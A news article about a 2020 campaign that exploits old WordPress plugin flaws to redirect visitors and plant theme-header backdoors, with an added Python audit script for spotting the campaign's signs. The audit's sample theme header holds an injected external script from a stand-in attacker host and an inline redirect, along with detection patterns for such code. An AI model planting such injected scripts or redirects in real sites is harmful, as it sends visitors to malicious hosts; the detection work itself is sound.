Thousands of WordPress sites redirecting users to dangerous domains

More than 900,000 WordPress sites have been attacked in a new campaign that aims to redirect visitors to malicious sites or, if an administrator is logged in, to plant a backdoor in the theme's header. Most of these attacks appear to be the work of a single threat actor, based on the malicious JavaScript payload they attempt to inject into vulnerable sites. The attacker also exploited old vulnerabilities that allowed them to change a site's home URL to the same domain used in the cross-site scripting (XSS) payload, so that visitors are redirected to malicious sites. In a blog post, Ram Gall, Senior QA at Defiant, provided additional insight into the scale of the campaign, stating: "While our records show that this threat actor may have delivered a lower volume of attacks in the past, it is only in the last few days that they have really increased, to the point that more than 20 million attacks were attempted against more than half a million individual sites on May 3, 2020. In the last month in total, we have detected that more than 24,000 separate IP addresses sent requests matching these attacks on more than 900,000 sites."
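As an added defensive check (not code from the article or from Defiant), the Python audit below applies the two indicators described above to a site's own data: a siteurl/home option rewritten to a foreign domain, and script injected into a theme header that loads from another host or redirects the browser. The wp_options values, the theme header and the expected hostname are constructed sample input, not values from the campaign.

```python
import re
from urllib.parse import urlparse

# Constructed sample input (not from the article): a wp_options excerpt in which
# the "home" option has been rewritten to a foreign domain.
SAMPLE_OPTIONS = {
    "siteurl": "https://example.com",
    "home": "https://evil-redirect.example",
}

# Constructed theme header: an injected external script and an inline redirect
# sit next to a legitimate stylesheet link on the site's own host.
SAMPLE_HEADER_PHP = """<head>
<script src="https://evil-redirect.example/track.js"></script>
<script>window.location.replace("https://evil-redirect.example/");</script>
<link rel="stylesheet" href="https://example.com/wp-content/themes/x/style.css">
</head>
"""

SCRIPT_SRC_RE = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
INLINE_SCRIPT_RE = re.compile(r'<script[^>]*>(.*?)</script>', re.I | re.S)
REDIRECT_RE = re.compile(r'(window|document)\.location|location\.(href|replace|assign)', re.I)

def host_of(url):
    """Lowercased hostname of a URL; None for relative paths or empty strings."""
    return urlparse(url).hostname

def check_home_url(options, expected_host):
    """Return (option, host) pairs where siteurl/home point away from the expected host."""
    findings = []
    for key in ("siteurl", "home"):
        host = host_of(options.get(key, ""))
        if host != expected_host:
            findings.append((key, host))
    return findings

def scan_theme_header(php_source, expected_host):
    """Flag <script src> loaded from another host and inline scripts that redirect."""
    findings = []
    for src in SCRIPT_SRC_RE.findall(php_source):
        host = host_of(src)
        if host and host != expected_host:   # relative paths have no host and are skipped
            findings.append(("external-script", src))
    for body in INLINE_SCRIPT_RE.findall(php_source):
        if REDIRECT_RE.search(body):
            findings.append(("inline-redirect", body.strip()))
    return findings
```

Run it against a database export of wp_options and the active theme's header.php; any finding is worth a manual look, since a legitimate CDN script would also be reported.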

Targeting old WordPress vulnerabilities

According to Gall, the attacker has targeted several vulnerabilities in WordPress plugins that have been removed from the official repository or fixed in recent years. More than half of all attacks targeted sites with the Easy2Map plugin, which contains an XSS vulnerability. Although the plugin was removed from the WordPress repository in August 2019, it is still installed on fewer than 3,000 sites. The attacker also exploited an XSS vulnerability in the Blog Designer plugin that was fixed in 2019, and one in the Newspaper theme that was fixed in 2016. To modify a site's home URL, the attacker exploited options update vulnerabilities in the plugins WP GDPR Compliance and Total Donations. WP GDPR Compliance has over 100,000 installs, but Defiant estimates that only 5,000 vulnerable installs remain. Total Donations was permanently removed from Envato Market in early 2019, and an estimated fewer than 1,000 installs remain. If your site uses one of these plugins or themes, it is highly recommended that you update them immediately and remove the ones that are no longer in the official WordPress repository.

Via BleepingComputer